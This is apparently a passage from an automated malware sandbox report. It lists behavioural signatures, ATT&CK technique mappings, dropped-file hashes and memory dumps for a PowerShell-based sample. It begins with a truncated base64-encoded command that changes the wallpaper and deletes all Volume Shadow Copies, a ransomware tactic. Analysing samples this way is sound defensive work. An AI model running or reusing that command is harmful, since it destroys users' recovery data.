B2ADoAVABNAFAAXAB3AGEAbABsAHAAcAAuAHAAbgBnACIADQAKAH0ADQAKAFIAVQBOAEQATABMADMAMgAuAEUAWABFACAAdQBzAGUAcgAzADIALgBkAGwAbAAsAFUAcABkAGEAdABlAFAAZQByAFUAcwBlAHIAUwB5AHMAdABlAG0AUABhAHIAYQBtAGUAdABlAHIAcwANAAoARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA0ACgBpAGYAIAAoACQAPwApACAAewAgAEwAbwBnACAAIgBjAGwAZQBhAHIAZQBkACAAdgBzAHMAIgAgAH0ADQAKAGUAbABzAGUAIAB7ACAATABvAGcAIAAiAGMAbABlAGEAcgAgAHYAcwBzACAAZgBhAGkAbABlAGQAIAAtACAAcABlAHIAbQBpAHMAcwBpAG8AbgBzAD8AIgAgAH0ADQAKAEwAbwBnACAAIgBkAG8AbgBlACIA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3436

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
5845c84770579f663af98389fd6dcfbf

SHA1
5afd8fe6e3ec95d926a43e3a52661267daf107bd

SHA256
0d7f4babe47bfe11e49955d16dc4959f2bc56ba73904a3aaf20cb45f361d04bf

SHA512
c409d415d2045908a8d77ed76f364a7c512156e5bddd5b0aa9ad1132292bd261fa77247cacb121038b41680c58b43168b04cb3c9bb98b0e13275eb6356db9c18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
70fb86e0e40d65cb43d2bbdfefc05d1e

SHA1
fb6b5cc302efc4db4329152c5a4eb01d75f014c4

SHA256
d3307b037d514e87a648673c9f557032f718ffc67df1ce807d6b4beb77429b81

SHA512
b7701bccd4b0772f5271672dc2164fe72f201994fddc4376a4f204569d6f8b5a5ac3f6e5eca7588f5f22f318b3b9ffebadfea759c9ba761a02457f1fccc42596

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3pggub1k.gwe.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/820-154-0x0000017554750000-0x0000017554760000-memory.dmp

Filesize
64KB

Download
memory/820-156-0x0000017554750000-0x0000017554760000-memory.dmp

Filesize
64KB

Download
memory/820-147-0x0000017554750000-0x0000017554760000-memory.dmp

Filesize
64KB

Download
memory/820-148-0x0000017554750000-0x0000017554760000-memory.dmp

Filesize
64KB

Download
memory/820-149-0x00000175561B0000-0x00000175561DA000-memory.dmp

Filesize
168KB

Download
memory/820-150-0x00000175561B0000-0x00000175561D4000-memory.dmp

Filesize
144KB

Download
memory/820-151-0x0000017554750000-0x0000017554760000-memory.dmp

Filesize
64KB

Download
memory/820-152-0x00000175561B0000-0x00000175561C0000-memory.dmp

Filesize
64KB

Download
memory/820-153-0x00000175565E0000-0x00000175565FA000-memory.dmp

Filesize
104KB

Download
memory/820-136-0x0000017555480000-0x00000175554A2000-memory.dmp

Filesize
136KB

Download
memory/820-155-0x0000017554750000-0x0000017554760000-memory.dmp

Filesize
64KB

Download
memory/820-146-0x0000017554750000-0x0000017554760000-memory.dmp

Filesize
64KB

Download
memory/1664-133-0x0000000000D20000-0x0000000000D32000-memory.dmp

Filesize
72KB

Download
memory/1664-135-0x000000001B920000-0x000000001BA6E000-memory.dmp

Filesize
1.3MB

Download
memory/3436-170-0x00000198C5E40000-0x00000198C5E50000-memory.dmp

Filesize
64KB

Download
memory/3436-171-0x00000198C5E40000-0x00000198C5E50000-memory.dmp

Filesize
64KB

Download
memory/3436-172-0x00000198C5E40000-0x00000198C5E50000-memory.dmp

Filesize
64KB

Download
memory/3436-173-0x00000198C5E40000-0x00000198C5E50000-memory.dmp

Filesize
64KB

Download
memory/3436-174-0x00000198C5E40000-0x00000198C5E50000-memory.dmp

Filesize
64KB

Download
memory/3436-175-0x00000198C5E40000-0x00000198C5E50000-memory.dmp

Filesize
64KB

Download
memory/3436-176-0x00000198C5E40000-0x00000198C5E50000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads